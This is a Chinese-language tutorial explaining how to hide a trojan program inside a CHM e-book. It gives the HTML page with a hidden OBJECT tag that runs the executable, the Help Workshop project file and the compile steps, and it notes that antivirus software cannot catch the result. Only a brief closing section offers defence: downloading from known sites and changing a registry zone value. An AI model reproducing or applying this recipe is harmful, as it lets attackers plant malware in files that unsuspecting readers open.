說(shuō)起CHM格式的電子書(shū)，可能無(wú)人不曉。有很大一部分電子圖書(shū)都是使用CHM格式編譯的。由于木馬程序嵌入了電子書(shū)中，殺毒軟件無(wú)法對(duì)其中存在的病毒等破壞性程序進(jìn)行檢查和清除。想知道這類電子書(shū)的制作方法嗎？今天筆者就以實(shí)例形式和大家一道分析一下。 
　　Step1:要想制作一個(gè)完美的CHM木馬，當(dāng)然少不了電子書(shū)的制作工具。在這里我們選擇微軟自家的Microsoft HTML Help Workshop。
　　當(dāng)然了，作為木馬程序的載體，一本CHM電子書(shū)是少不了的。本文演示所采用的是系統(tǒng)幫助文件中現(xiàn)成的windows.chm。

　　Step2:首先運(yùn)行windows.chm，在右側(cè)的空白處點(diǎn)擊右鍵菜單，進(jìn)入"屬性"頁(yè)。記錄下該電子文檔的默認(rèn)主頁(yè)default.htm和標(biāo)題欄文字Windows 2000兩項(xiàng)信息。

　　Step3:接下來(lái)需要制作一個(gè)可以讓木馬運(yùn)行并且同時(shí)可以自動(dòng)跳轉(zhuǎn)到windows.chm默認(rèn)主頁(yè)的網(wǎng)頁(yè)，例如cytkk.htm，源代碼如下：

<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='default.htm'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobje
ct" CODEBASE="灰色按鈕克星.exe">
</OBJECT>
</BODY>
</HTML>

　　代碼注釋：

　　content="3是轉(zhuǎn)向時(shí)間（單位為秒），可以根據(jù)木馬程序的運(yùn)行時(shí)間自行修改，建議不要超過(guò)5秒。其中的default.htm可以改為你用的電子書(shū)的默認(rèn)主頁(yè)名，灰色按鈕克星.exe為木馬程序名，你可以根據(jù)情況更改。

　　Step4:運(yùn)行HTML Help Workshop，選擇文件菜單下的反編譯項(xiàng)。接下來(lái)在反編譯后的目錄中可以看到windows.hhc（對(duì)應(yīng)幫助文檔左側(cè)的"目錄"項(xiàng)）和windows.hhk（對(duì)應(yīng)幫助文檔左側(cè)的"索引"項(xiàng)）。

　　Step5:現(xiàn)在要做的就是把木馬程序復(fù)制到反編譯后的目錄中（本文中以插入灰色按鈕克星.exe這款小軟件為例），并在此目錄下建立一個(gè)例如文件名為cytkk.hhp的文件（用記事本即可），代碼如下：

[OPTIONS]
Compatibility=1.1 or later
Compiled file=windows.chm
Default Window=Main
Language=0x804 中文(中國(guó))
[WINDOWS]
Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
[FILES]
cytkk.htm

　　灰色按鈕克星.exe

　　代碼注釋：

　　windows.chm可以改為你要生成的電子書(shū)名，而灰色按鈕克星.exe則把它改為要嵌入的木馬程序名，Main=后面改為在第一步時(shí)你得到的標(biāo)題欄文字，windows.hhc及windows.hhk分別改為第三步得到的文件名。

　　最后用HTML Help Workshop打開(kāi)cytkk.hhp，點(diǎn)擊"文件"→"編譯"，待提示完成后，就可以在目標(biāo)目錄中發(fā)現(xiàn)已經(jīng)編譯好的帶有木馬的電子書(shū)windows.chm了。

　　高手傳經(jīng)：防之有道

　　我們不可能對(duì)下載的每本書(shū)都進(jìn)行反編譯工作來(lái)加以檢查，那是會(huì)累死人的。筆者建議大家在下載電子書(shū)籍時(shí)，盡量去知名網(wǎng)站下載。
另外讀者朋友們也可以修改本地安全屬性，使CHM木馬無(wú)法在本地運(yùn)行木馬程序，將注冊(cè)表"HKEY_CURRENT_U
SER\Software\Microsoft\Windows\Current
Version\Internet Settings\Zones\0"下的1004項(xiàng)的值由原來(lái)十進(jìn)制的0改為十六進(jìn)制的3。

最新評(píng)論